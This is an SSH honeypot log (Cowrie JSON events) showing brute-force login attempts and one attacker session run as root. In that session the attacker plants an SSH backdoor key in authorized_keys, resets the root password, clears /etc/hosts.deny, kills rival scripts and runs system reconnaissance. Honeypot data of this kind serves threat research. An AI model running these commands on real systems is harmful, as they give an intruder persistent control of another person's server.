{"eventid":"cowrie.session.connect","src_ip":"102.68.86.62","src_port":52894,"dst_ip":"1.2.3.4","dst_port":22,"session":"2eefa37e486a","protocol":"ssh","message":"New connection: 102.68.86.62:52894 (1.2.3.4:22) [session: 2eefa37e486a]","sensor":"my-vps","timestamp":"2025-09-09T04:12:43.578424Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:12:43.579237Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:12:43.754418Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
{"eventid":"cowrie.login.success","username":"root","password":"manager","message":"login attempt [root/manager] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:12:44.485835Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:12:44.882839Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:12:44.883599Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:12:44.884732Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:12:45.055890Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:12:45.448849Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:12:45.449670Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:12:45.621679Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:12:45.622741Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
{"eventid":"cowrie.session.connect","src_ip":"102.68.86.62","src_port":52910,"dst_ip":"1.2.3.4","dst_port":22,"session":"75a23d7544ec","protocol":"ssh","message":"New connection: 102.68.86.62:52910 (1.2.3.4:22) [session: 75a23d7544ec]","sensor":"my-vps","timestamp":"2025-09-09T04:12:46.810504Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:12:46.811491Z","src_ip":"102.68.86.62","session":"75a23d7544ec"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:12:46.983475Z","src_ip":"102.68.86.62","session":"75a23d7544ec"}
{"eventid":"cowrie.session.connect","src_ip":"103.59.95.12","src_port":47690,"dst_ip":"1.2.3.4","dst_port":22,"session":"19ee74b3cebe","protocol":"ssh","message":"New connection: 103.59.95.12:47690 (1.2.3.4:22) [session: 19ee74b3cebe]","sensor":"my-vps","timestamp":"2025-09-09T04:12:47.039820Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:12:47.040668Z","src_ip":"103.59.95.12","session":"19ee74b3cebe"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:12:47.296849Z","src_ip":"103.59.95.12","session":"19ee74b3cebe"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T04:12:47.732528Z","src_ip":"102.68.86.62","session":"75a23d7544ec"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-09T04:12:48.367711Z","src_ip":"103.59.95.12","session":"19ee74b3cebe"}
{"eventid":"cowrie.session.connect","src_ip":"192.210.135.20","src_port":57552,"dst_ip":"1.2.3.4","dst_port":22,"session":"45361685c4c5","protocol":"ssh","message":"New connection: 192.210.135.20:57552 (1.2.3.4:22) [session: 45361685c4c5]","sensor":"my-vps","timestamp":"2025-09-09T04:12:48.663247Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:12:48.664282Z","src_ip":"192.210.135.20","session":"45361685c4c5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:12:48.777108Z","src_ip":"192.210.135.20","session":"45361685c4c5"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:12:48.903769Z","src_ip":"102.68.86.62","session":"75a23d7544ec"}
{"eventid":"cowrie.login.failed","username":"webtest","password":"password123","message":"login attempt [webtest/password123] failed","sensor":"my-vps","timestamp":"2025-09-09T04:12:49.255684Z","src_ip":"192.210.135.20","session":"45361685c4c5"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:12:49.999236Z","src_ip":"103.59.95.12","session":"19ee74b3cebe"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:12:50.366731Z","src_ip":"192.210.135.20","session":"45361685c4c5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:12:55.104707Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep name | wc -l","sensor":"my-vps","timestamp":"2025-09-09T04:12:55.105432Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","size":2,"shasum":"3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:12:55.277793Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:12:55.728656Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
{"eventid":"cowrie.command.input","input":"echo \"root:gKP0zZKuBznL\"|chpasswd|bash","message":"CMD: echo \"root:gKP0zZKuBznL\"|chpasswd|bash","sensor":"my-vps","timestamp":"2025-09-09T04:12:55.729337Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/03d4b0fac86ec295fbd219f39785ce1e88d1b5ef7162322bdedd02e2be8c3fa7","size":21,"shasum":"03d4b0fac86ec295fbd219f39785ce1e88d1b5ef7162322bdedd02e2be8c3fa7","duplicate":false,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/03d4b0fac86ec295fbd219f39785ce1e88d1b5ef7162322bdedd02e2be8c3fa7 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:12:55.901352Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:12:56.302011Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
{"eventid":"cowrie.command.input","input":"rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","message":"CMD: rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","sensor":"my-vps","timestamp":"2025-09-09T04:12:56.302690Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","shasum":"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","destfile":"/etc/hosts.deny","message":"Saved redir contents with SHA-256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b to var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","sensor":"my-vps","timestamp":"2025-09-09T04:12:56.476772Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","size":0,"shasum":"a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:12:56.477623Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:12:56.913999Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","message":"CMD: cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","sensor":"my-vps","timestamp":"2025-09-09T04:12:56.914690Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","size":35,"shasum":"95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:12:57.086788Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:12:57.477200Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
{"eventid":"cowrie.command.input","input":"free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","message":"CMD: free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","sensor":"my-vps","timestamp":"2025-09-09T04:12:57.477866Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","size":29,"shasum":"ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:12:57.652501Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:12:58.010449Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
{"eventid":"cowrie.command.input","input":"ls -lh $(which ls)","message":"CMD: ls -lh $(which ls)","sensor":"my-vps","timestamp":"2025-09-09T04:12:58.011276Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
{"eventid":"cowrie.command.input","input":"which ls","message":"CMD: which ls","sensor":"my-vps","timestamp":"2025-09-09T04:12:58.011924Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","size":55,"shasum":"a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:12:58.184256Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:12:58.619753Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
{"eventid":"cowrie.command.input","input":"crontab -l","message":"CMD: crontab -l","sensor":"my-vps","timestamp":"2025-09-09T04:12:58.620466Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","size":20,"shasum":"f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:12:58.792279Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:12:59.149328Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
{"eventid":"cowrie.command.input","input":"w","message":"CMD: w","sensor":"my-vps","timestamp":"2025-09-09T04:12:59.150059Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","size":197,"shasum":"50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:12:59.321611Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:12:59.752504Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
{"eventid":"cowrie.command.input","input":"uname -m","message":"CMD: uname -m","sensor":"my-vps","timestamp":"2025-09-09T04:12:59.753203Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","size":7,"shasum":"ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:12:59.924597Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:13:00.319048Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep model | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep model | grep name | wc -l","sensor":"my-vps","timestamp":"2025-09-09T04:13:00.319782Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","size":2,"shasum":"64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:13:00.491506Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:13:00.853866Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
{"eventid":"cowrie.command.input","input":"top","message":"CMD: top","sensor":"my-vps","timestamp":"2025-09-09T04:13:00.854548Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","size":44,"shasum":"28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:13:01.026600Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:13:01.468350Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
{"eventid":"cowrie.command.input","input":"uname","message":"CMD: uname","sensor":"my-vps","timestamp":"2025-09-09T04:13:01.469103Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","size":6,"shasum":"5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:13:01.640830Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:13:02.009752Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-09-09T04:13:02.010754Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
